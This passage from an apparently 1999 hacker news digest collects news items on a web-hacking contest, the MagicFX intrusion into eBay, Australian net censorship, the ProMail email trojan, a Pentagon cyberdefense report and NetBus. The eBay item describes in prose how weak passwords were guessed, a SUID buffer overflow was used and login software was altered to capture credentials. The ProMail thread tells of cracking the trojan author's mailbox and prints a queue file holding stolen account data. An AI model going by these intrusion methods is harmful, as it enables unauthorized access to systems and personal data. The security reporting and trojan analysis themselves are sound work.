sponsoring a contest to draw attention to web server security. They have set up a WindowsNT and a Linux system with a hidden file. First person to get the file wins an IBM Netfinity-server. Try your skillz. PC Intern: http://www.pcintern.de/hacker.htm * Welcome to the Web-Hack! * We wish all participants good luck! * Look for "hack.txt", please! * This is the wayto the Linux-Server: IP: 195.227.43.210 * This is the way to the Windows-NT-Server: IP: 195.227.43.211 Is there optimal protection? The editorial staff of the German computer magazine PC INTERN wants to draw attention to security of data in web-server-systems in an outstanding contest. The hack-event aims at checking and discussing the reliability of Windows-NT- and Linux-PCs' security. Starting at 9.00 am on Thursday 18th, 1999, you will find two links on this site which will lead to the servers to be hacked. On both servers there is hidden a telephone-number and a password. The person who will call first telling the password and the way he or she hacked the server, wins an IBM Netfinity-server. PC INTERN grants the hackers total exemption from punishment - PC INTERN's single aim is to expose and discuss the security's weak spots. On IBM's stage (hall 2, D28) between 1.00 and 2.00 pm, a debate will finish the web-hack-event. Dr. Harald Feldkamp, editor in chief, will discuss about security in the world wide web with the following participants: Dr. Werner Schmidt Ministerialrat beim Bundesbeauftragten für den Datenschutz Wilfried Seiffert Ministerialrat beim niedersächsischen Landesbeauftragten für den Datenschutz Frank Kertscher Principal IT Security für IBM Global Services Klaus Birkenbihl GMD Informationstechnik GmbH Tilmann Müller-Gerbes Leiter Professional Services bei S.u.S.E. Felix Höger Geschäftsführer der NDH Netzwerkdienste Höger @HWA 17.0 eBay owned ~~~~~~~~~~ http://www.ebay.com MagicFX cracks eBay contributed by Code Kid According to MagicFX eBay has been owned for quite some time. To prove this on March 13th he replaced the main web page on one of the servers for a journalist to confirm. The article goes into detail on just how badly eBay is owned. Forbes; http://www.forbes.com/tool/html/99/mar/0319/side1.htm Going once, going twice ... HACKED! By Adam L. Penenberg EBay(nasdaq: EBAY), the hot one-to-one auction site, was hacked on Saturday March 13 by a 22-year old college student who goes by the handle MagicFX. But the story doesn't end there. The hacker maintains access to the site and can return at will. He has "root" access to eBay's computers, the same kind the legitimate administrators enjoy. This means he could change prices or place fake ads, divert traffic to other sites or even take down the entire network. This was starkly illustrated to this reporter on Wednesday night, when the hacker, to prove his point, took down eBay's home page for two minutes and replaced it with the message: Proof by MagicFX that you can't always trust people… not even huge companies. (who woulda known that?) "It's 9:30 PM . . . do you know who has YOUR credit card information?" Although eBay customers don't use credit cards to pay for merchandise--the site acts as a middleman--sellers use them to pay the company service fees. When contacted, the company refused to comment, saying that unnamed law enforcement officials had requested that eBay remain silent about issues surrounding hacking. Initially, the hacker, who would not divulge his real name, gained access to eBay's computers on Saturday afternoon by figuring out what accounts existed, then trying simple passwords. Since eBay is an e-commerce site, MagicFX tried words like "commerce," "trading" and "eBay," until he cracked one, although he would not divulge the password he used. He says he was surprised eBay's technicians didn't use standard password protecting schemes, which would have meant a mixture of numbers and letters. Once inside, MagicFX employed a technique referred to as a "local root buffer overflow." He ran a script that transmits too much information into a targeted zone. The data that can't fit is then manipulated so that he was able to trick the computer into running his commands at an elevated privilege. "I exploited a buffer overflow condition, which existed in an SUID root program," says the hacker, who is finishing up a B.S. in computer science. "Then I used software which I had written myself to get to the rest of the network. FreeBSD was the first machine I accessed, the rest were Solaris." From there, MagicFX modified the system's software so that instead of providing administrators with a secure way to work from a remote machine, it logged that information to a hidden file, so that not only could he intercept passwords and log in names, but actually watch everyone's keystrokes. "After gaining access to more of the network, I tried to figure out how the service worked. Most of the web servers run on Windows machines, which use the SMB protocol to load a template page off a specified machine and dynamically create the HTML." For Saturday's hack, MagicFX left his page up for about 45 minutes; he claims it was viewed by about 4,000 site visitors. (Hackers often attack on weekend evenings, because most system administrators are out of the office.) The reason more people didn't witness the hack is that eBay deploys several web servers and balances the load based on the amount of traffic. Since MagicFX exploited only one machine for the web page hack, only users served by that machine could view the hacked page. But he claims the company must know about the hack, since he monitored E-mails from users alerting the company. He pulled his own page down and logged off when he spotted a system administrator--"to be nice." Mirrors--or copies--of both Saturday's and Wednesday's hacked eBay pages have been archived by Brian Martin, a computer security consultant, on his site attrition.org (http://www.attrition.org/mirror/attrition/ebay.com) What does MagicFX say about eBay's security? "I think they have better security than NASA, but that's not saying much." Martin, who also witnessed the Wednesday night eBay hack, says, "Large systems like eBay are focused on keeping the money machine running smoothly, but this has come at the expense of security. Users should realize that just because a site says their personal information and credit card numbers are secure doesn't necessarily make it so." MagicFX says he hacked eBay, which has a market cap of more than $18 billion, because he wanted to see how a large e-commerce site worked from the inside. Once there, he discovered an added bonus: eBay uses a proprietary system to do its trading, he says, and the source code is highly prized in the hacker world. As a result, a number of hackers have approached him for a copy, but he has not complied,, since he hasn't had a chance to sift through it yet. This was not the first hack for MagicFX. Recently he also defaced web sites promoting the movies Varsity Blues and 200 Cigarettes, "because they got a lot of hits and I didn't like the movies really." He also hit monicalewinsky.com because it is "anti-Clinton" and "ourfirsttime," a site that claimed it would webcast a man and woman losing their virginity. MagicFX says he hacked the site to get the word out it was a media hoax. "I have learned at least as much by hacking as I have in school," he says. External link: attrition.org @HWA 18.0 Aussies to ban Net pr0n ~~~~~~~~~~~~~~~~~~~~~~~~ From The Australian http://technology.news.com.au/techno/4317712.htm Alston's regime to ban Net nasties By WAYNE ADAMS and DAN TEBBUTT 20mar99 COMMUNICATIONS and Information Technology Minister Richard Alston has unveiled a regime that will effectively ban X-rated and Refused Classification material from the Internet. "There's no doubt the Internet provides enormous educational and informational opportunities but, at the same time, it does pose considerable risks for the community," he said yesterday. "We are therefore proposing to introduce a new regime that will hopefully ensure, certainly for Internet sites hosted within Australia, that we block access to material that is either illegal, Refused Classification or X-rated and, in relation to R-rated material, is only available to those over 18 years of age." The Australian Broadcasting Authority will oversee the regime. Community and Internet industry groups will be included under the proposals. They will provide a "hotline" on offensive material and pass information to the ABA, monitor online sites, advise on complaints mechanisms and provide community education. If the ABA thinks content is serious enough, it will be able to prevent access to the material pending a National Classification Board opinion. The authority will have to issue a notice to a service provider to halt access to any content deemed to be proscribed content. Senator Alston rejected suggestions that the announcement was related to the Telstra sale or appeasing Independent senator and morals campaigner Brian Harradine. "Senator Harradine is probably the most visible public manifestation of concern, but the fact is that there are many hundreds of thousands of people in Australia who would have the greatest concern if they thought that under-age children could have access to illegal or highly offensive material," he said. However, Labor's communications spokesman, Stephen Smith, said Senator Harradine and parents "should not be duped". "The announcement today is about Australian content, and it's a very small proportion of Internet content which is locally produced and locally put online," he said. Kimberley Heitman, chairman of Internet advocacy group Electronic Frontiers Australia, said: "This is as bad as it gets – they have ignored everything the Internet industry has said. None of these things will affect end users. It will just drive content offshore." @HWA 19.0 More on the Promail email trojan ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Originally reported in the last issue, here's more info from packetstorm on the Promail email trojan program. Date: Fri, 19 Mar 1999 09:41:18 +0100 From: Aeon Labs To: packetstorm@genocide2600.com Subject: security/privacy news (Perhaps this might be of interest to Your readers.) ProMail v1.21, an advanced freeware mail program spread through several worldwide distribution networks (SimTel.net, Shareware.com and others), is a trojan. Upon discovering - through LAN sniffing - that the program would attempt to connect to SMTP instead of POP3 when a regular mail check was performed, we reverse-engineered the software. ALL of the personal user data, including the user's password in encrypted format, is sent to an account on NetAddress - a free email provider - as soon as a valid internet connection is detected. Apart from this "feature", the software is 100 % functional and very well done. Well, it seems that 1999 is the worst year for privacy... More detailed information can be found on our web site at http://cool.icestorm.net/aeon/news.html --------------------------------------------------------------------- Aeon Labs http://cool.icestorm.net/aeon [http://cool.icestorm.net/aeon/news.html] 03.99] ProMail v1.21, an advanced freeware mail program for Windows 95/98, is a trojan. It has been spread through several worldwide distribution networks (SimTel.net, Shareware.com and others) as proml121.zip. Upon discovering - through LAN sniffing - that the program would attempt to connect to SMTP instead of POP3 when a regular mail check was performed, we reverse-engineered the software. The executable, which appears to have been created with Borland Delphi, has been packed with Petite (a shareware Win32-EXE compressor) and then "hexed" to make disassembly harder. ProMail v1.21 supports multiple mailboxes; every time a new mailbox is created, an "ini" file containing the users full name, passwords, email addresses, servers and more is generated. Prior to doing any other action, the program performs a check for a valid network connection which, if found, allows for the sending of ALL of the personal user data, including the user's password in encrypted format, to an account on NetAddress - a free email provider. Apart from this "feature", the software is 100 % functional and very well done. For further information or a more detailed analysis contact us. --------------------------------------------------------------------------------- Date: Sat, 20 Mar 1999 03:51:00 -0500 (EST) From: aeon@army.net To: packetstorm@genocide2600.com Subject: Re: your mail currently our members have disassembled and analyzed the whole executable. the only thing it appears to do as a trojan is to send the accounts data entered by the user: full name, organization, email address, user name, password (encrypted), smtp and pop3 servers, etc. and since promail supports multiple accounts, each newly created account is sent. the data for each account is contained in a text file which is used to initialize promail at run-time. the same text file is used as body of the email which is sent to the author (supposedly) of the program. it appears that all emails are sent with same subject line: "kirio". the program also creates the file promail.pml in its directory. it's a zero length file used as permanent flag to "remember" to the trojan that one or more accounts data could not be sent in the last session (for example, when accounts are created off-line, or when not followed by a mail check in the same session). we also managed to crack the mailbox to which accounts data is sent. about ~80 emails (== accounts) were found and another dozen was received after only ten minutes or so. accounts for microsoft, michigan us army, old bridge chemicals and a videogames company - amongst the others - were found. we have merely informed a _contact_ (not the ml) in ntbugtraq and several "underground" news/security sites. well you can contact the various *traq mailing lists if you want. we don't care if people still trust anything that can be downloaded from the net anyway. i guess we're not exactly "white hat" hackers :P if you need any help or further analysis on a specific part of the program please feel free to contact us. ------------------------------------------------------------------------ Aeon Labs http://cool.icestorm.net/aeon --------------------------------------------------------------------------------- Date: Sun, 21 Mar 1999 09:40:26 +0100 From: Patrick Oonk To: tattooman@ADRIC.GENOCIDE2600.COM Subject: [patrick@pine.nl: ProMail trojan proof] ----- Forwarded message from Patrick Oonk ----- Hi, I've tested the ProMail Trojan, it sends the info to naggamanteh@usa.net using the smtp server you supply when creating an account. I'll Cc: abuse@usa.net and bugs@shareware.com ProMail can still be downloaded at many sites, just check http://search.shareware.com/code/engine/File?archive=sim-win95&file=email%2fproml121%2ezip&size=409141 These are the queue files at my smtp server after I installed ProMail and created an account: $ more /var/spool/mqueue/qfPAA17183 V2 T921939650 K921939657 N1 P30435 I6/0/88205 M... reply: read error from office.pine.nl. Fb $rSMTP $sfoo $_foo.domain.com [10.0.0.1] S RPFD: H?P?Return-Path: HReceived: from foo (foo.domain.com [10.0.0.1]) by bar.domain.com (8.9.1/8.9.1) with SMTP id PAA17183 for ; Sat, 20 Mar 1999 15:20:50 +0100 (MET) H?D?Date: Sat, 20 Mar 1999 15:20:50 +0100 (MET) H?F?From: patrick@pine.nl H?M?Message-Id: <199903201420.PAA17183@bar.domain.com> HTo: naggamanteh@usa.net HSubject: kirio $ more /var/spool/mqueue/dfPAA17183 Name=New Account [From] EMail=patrick@pine.nl Name=Patrick Oonk Organization=Pine Internet B.V. [ReplyTo] EMail=patrick@pine.nl Name=Patrick Oonk [POP3] Server=pop.domain.com Port=110 User=patrick Password=1hFATUIxWOkJ3b3N3chBXZrFmZMUE PromptPassword=0 DoPOP=1 StandardDownload=0 [SMTP] Server=smtp.domain.com Port=25 DoSMTP=1 [Filter] Keep= Delete= -- : Patrick Oonk - http://patrick.mypage.org/ - patrick@pine.nl : : Pine Internet B.V. Consultancy, installatie en beheer : : Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ : : -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- : : "unix is voor types zonder sociaal leven..." - Patrick van Eijk : ----- End forwarded message ----- -- : Patrick Oonk - http://patrick.mypage.org/ - patrick@pine.nl : : Pine Internet B.V. Consultancy, installatie en beheer : : Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ : : -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- : : "unix is voor types zonder sociaal leven..." - Patrick van Eijk : : A signature starts with "-- ". : --------------------------------------------------------------------------------- Date: Mon, 22 Mar 1999 18:20:50 +0900 (JST) From: Aeon Labs To: packetstorm@genocide2600.com Subject: ProMAIL users So far we have collected hundreds of email *addresses* from naggamanteh@usa.net (only the headers were retrieved, we don't want their passwords/personal data/etc). With these addresses, users of ProMail could be warned about the problem with their passwords. If you can find people who are willing to do the work, we'll send you a list of the addresses we have collected. ----------------------------------------------------------------------------- Aeon Labs http://cool.icestorm.net/aeon 20.0 C41 - Pentagon’s cyberdefenses criticized ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Pentagon’s cyberdefenses criticized Report: Threats aren’t taken seriously enough by HQ, troops MSNBC STAFF AND WIRE REPORTS WASHINGTON, March 22 The military’s key communications infrastructure is dangerously vulnerable to attacks from cyberspace and requires urgent changes, according to a new study ordered by Congress and sponsored by the Pentagon. One avenue the Pentagon was advised to consider was a change in policy that would allow it to counter -attack when a cyberattacker strikes. THE COMMAND, Control, Communications, Computers and Intelligence systems - known as C4I - is compromised by security problems and also by a military culture prone to treating such problems as a lesser priority, a National Research Council committee reported."The rate at which information systems are being relied on outstrips the rate at which they are being protected," it said. "The time needed to develop and deploy effective defenses in cyberspace is much longer than the time required to develop and mount an attack." It also suggested the Pentagon consider whether "counter-attack is an appropriate response to a cyber attack." As U.S. policy now stands, the Pentagon may not go after cyber attackers, instead handing off investigations to civilian law enforcement agencies. Despite evidence of security lapses in C4I - which handles communications and warning tasks along the chain of command - the Pentagon's "words regarding the importance of information systems security have not been matched by comparable action," the report said. MANAGEMENT CRITICIZED "Troops in the field did not appear to take the protection of their C4I systems nearly as seriously as they do other aspects of defense," said the report, which Congress ordered the Pentagon to commission in 1995. The council is an independent organization chartered by Congress to advise the government. The committee said it observed one military field exercise in which personnel in an operations center mistakenly took as a joke a cyber attack on their systems. The report indicated the problems were due more to the Pentagon 's management of the systems than to the technology itself. It cited C4I workers' lack of stature compared with traditional combat forces, compatibility problems between the services and a need for more budget flexibility on the matter from both the Defense Department and Congress. PENTAGON'S RESPONSE In a statement, the Pentagon acknowledged that the military's strength "is our information technology," and that "our dependence on such assets, which may be subject to malicious attack, makes information technology our weakness as well." It said that as the council's report was being prepared, the Defense Department had already improved protection against computer attack by implementing new programs, establishing a joint task force for computer defense and expanding training of its information technology personnel. But Kenneth Allard, an analyst who has written about C4I, said its weaknesses are in part the fault of "Industrial Age" military acquisition policies - applying to computers as well as tanks, ships and aircraft - that give the services their own procurement duties. Ships and tanks may perform different tasks, he said, but the Army, Navy and other services need a single-standard computer system. "Twenty-first century combat is the war of the databases, in which information flows must go from the foxhole to the White House and back down again," said Allard, a former Army colonel and analyst at the Center for Strategic and International Studies who had not yet read the council's report. RECOMMENDATIONS The report recommended:making C4I a greater budget priority in defense spending, with a flexibility that can "exploit unanticipated advances in C4I technology." Designating an organization responsible for providing direct defensive operational support to commanders. o Funding a program to conduct frequent, unannounced penetration testing of C4I systems. o Ensuring that programs are operable even if one part has been penetrated by an adversary. o Emphasizing the importance of information technology in the military leadership. o Establishing an Institute for Military Information Technology, possibly as part of an existing body. An archive audio copy of the Senate hearing is available via the FedNet service at www.fednet.net/h0322b.htm. MSNBC’s Miguel Llanos and The Associated Press contributed to this report. @HWA 21.0 [ISN] NetBus 'Trojan' Splits Security Community ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NetBus 'Trojan' Splits Security Community (03/02/99, 7:46 p.m. ET) By Lee Kimber, Network Week Internet-connected networks could be left vulnerable to Trojan attacks because leading anti-virus software vendors have said they won't scan and disable a new, more powerful NetBus Trojan. Remote-control programs like NetBus were dubbed Trojans because they could be hidden on computers by crackers. The latest version of NetBus has split network-security experts because its author said it was not a Trojan as it remained visible. But crackers reportedly rewrote it to make it invisible within days of its launch. Data Fellows and Sophos said their anti-virus products would not disable the recently launched remote-control Trojan NetBus 2 Pro because its Swedish author Carl-Fredrik Neikter was a professional who now charged $12 for a legitimate shareware product. "NetBus 2.0 Pro is not detected as it is now commercial software," according to a spokesman for Data Fellows' European office in Finland. "NetBus 1.x up to 1.7 was detected by anti-virus scanner F-Secure but not NetBus 2.0" Data Fellows' website reported that earlier NetBus versions were used frequently to steal data and delete files on people's machines. NetBus lets crackers to take remote control of networked PCs, but publicity over its spread has been eclipsed by the Back Orifice remote-control Trojan written by hacker group Cult of the Dead Cow. But unlike Back Orifice, NetBus can infect Windows NT machines and is mo